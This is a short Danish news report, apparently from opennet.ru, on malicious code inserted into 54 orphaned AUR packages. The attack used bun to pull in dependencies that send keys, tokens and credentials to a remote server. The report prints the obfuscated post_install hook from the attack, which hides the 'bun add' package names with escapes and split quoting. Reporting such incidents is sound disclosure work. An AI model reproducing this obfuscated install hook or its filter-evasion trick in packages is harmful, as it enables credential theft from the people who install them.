Ondsindet kode er blevet indsat i 54 yderligere pakker i AUR.

Trods de foranstaltninger, som Arch-udviklerne har truffet Linux, indsættelse af ondsindet kode i AUR (Arch User Repository)-arkivet er ikke blevet stoppet. For et par timer siden blev ondsindet kode indsat i yderligere 54 pakker, der var efterladt uden vedligeholdere (historik over ondsindede redigeringer er blevet tilbageført). I modsætning til angrebene i forgårs bruges bun-platformen denne gang i stedet for npm-pakkehåndteringen til at installere ondsindede afhængigheder. For at omgå de implementerede filtre indsættes en obfuskeret streng i post_install-funktionen, der kalder kommandoen "bun add" for at installere pakker med ondsindet kode, der scanner og sender dem til en ekstern server. server nøgler, tokens og legitimationsoplysninger.

post_install() {
$'\x63′"d" "/"'t'"m"'p' && "b"u"n' 'a'"d"'d $'\141\x6e"s'"i""-"$'\143"o"l"o"r'$'\x73′ 'n'"e"'x'"t""f"'i"l"e"-"j"s'
}

Kilde: opennet.ru

Køb pålidelig hosting til websteder med DDoS-beskyttelse, VPS VDS-servere 🔥 Køb pålidelig webhosting med DDoS-beskyttelse, VPS VDS-servere | ProHoster